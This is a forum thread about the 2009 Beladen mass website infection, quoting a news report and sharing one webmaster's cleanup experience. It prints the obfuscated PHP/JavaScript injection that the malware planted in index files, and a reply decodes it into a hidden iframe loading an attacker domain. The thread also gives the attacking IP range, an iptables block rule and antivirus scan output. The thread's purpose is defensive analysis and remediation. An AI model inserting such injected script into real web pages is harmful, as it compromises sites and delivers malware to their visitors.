Over 40,000 Websites Infected By Growing Beladen Virus

Status
Not open for further replies.

apirateslife

More than 40,000 websites have fallen victim to a virus attack that is still growing, security experts have said.

Security firm Websense says the site beladen.net is infecting legitimate websites all over the world with malicious code that then tries to install malware on the computers of people visiting them.

The Beladen virus is still active, with the number of affected sites growing from 20,000 to over 40,000 since Friday.

Carl Leonard, security research manager for EMEA at Websense, said the Beladen virus poses a "pretty serious" threat to users.

"We are trying to look into how these sites are compromised in the first place," he said. Anti-virus detection capability is also not that high, with 13 out of 40 systems tested by Websense failing to detect the malware.
Code:
http://www.computerweekly.com/Articles/2009/06/03/236279/over-40000-sites-infected-by-growing-beladen-virus.htm
I had one client that was infected with this virus. Apparently it logs FTP information, then tries to log in via FTP; once logged in, the virus adds malicious code to all index.* files and then spreads itself to visitors of the victim's website.

After I learned my client's website was infected, I suspended the account, removed the malicious code from the index files, changed the hosting account password, and advised my client to scan his computer for viruses with Avira Premium Security.

Here is the Malicious code the virus embeds into the files:
Code:
<?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>'; ?>
Whenever someone visits an infected website it will prompt them to download a malicious PDF document, and if Adobe Reader is installed it will exploit Adobe Reader and install trojans on the victim's system.

There have been numerous reports on both the DirectAdmin and cPanel forums.

Code:
http://www.directadmin.com/forum/showthread.php?p=157823
http://forums.cpanel.net/general/62821-iframe-javascript-hacks-35.html
We have seen lots of this as well and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their ftp credentials from their stored passwords or (more likely) sniffing their username and password during an ftp session since ftp is a cleartext protocol. The virus would either then "phone home" or fire up its own ftp connection and dl all .htm, .html and .php files from the user's account, add its iframe or js code and reupload.

Just changing the ftp password makes no difference since the new password is compromised the very next time they make a connection (usually to fix their pages).

The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too.
Code:
http://www.directadmin.com/forum/showpost.php?p=158146&postcount=22
The IP that is responsible for adding the malicious code.
Code:
91.212.65.147
Code:
http://whois.domaintools.com/91.212.65.0
If you're running a Windows machine, I recommend you uninstall Adobe PDF Reader and install Avira Premium Security Suite, as it detects and prevents this virus ;).
Code:
http://www.avira.com/en/downloads/avira_premium_security_suite.html
If you're a webmaster, webhost, or internet user, I recommend blocking this IP range with your firewall.
Code:
91.212.65.0/24
iptables:
Code:
iptables -I INPUT -s 91.212.65.0/24 -j DROP
An easy way to see if your website has been infected, would be to download a backup of your files and scan the backup archive with Avira Premium Security Suite.
Code:
--> ./tmp/webalizerftp/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/ips_kernel/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/converge_local/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/public/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/uploads/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/interface/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/cache/index.html
    [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
If you have been infected, then scan your computer for viruses, and change your passwords after your machine is virus free.

My friend reported that a website on Katz tried to force him to download a PDF document. So don't download any magical PDF documents ;).
 
11 comments
Nice to see :)
I've decoded the JavaScript code
Code:
118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52
Decoded
Code:
var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>'); function gg6345(){var as3113=9+7544;} var mnbq=4304182
And after processing manually the decoded javascript you get
Code:
<iframe src='http://karlast.com/' width='1' height='3'>

And probably from that website, he sent the virus attack.
 
Yeah, it came from that website and that domain has been blocked for abuse already.

Code:
http://whois.domaintools.com/karlast.com
They could be using other domains as well.
 
Hello guys,
First of all, I really thank you for all the information.
I did deny all IPs from my site, beginning from 91.212.65.0 and ending at 91.212.65.255.
Is this ok?
I removed Foxit PDF Reader; my site currently does not require any PDF files to be downloaded, so is it free of virus?
 
Why did you remove Foxit PDF Reader? Just don't use Adobe Reader and don't open PDF files that you didn't request.
 
This virus did the 'job' of a backdoor script for websites, sending traffic to the main website, which is now down. So it became a useless virus as long as the visitors are sent to a non-working page.
Good to remember, but this virus wasn't so powerful.
 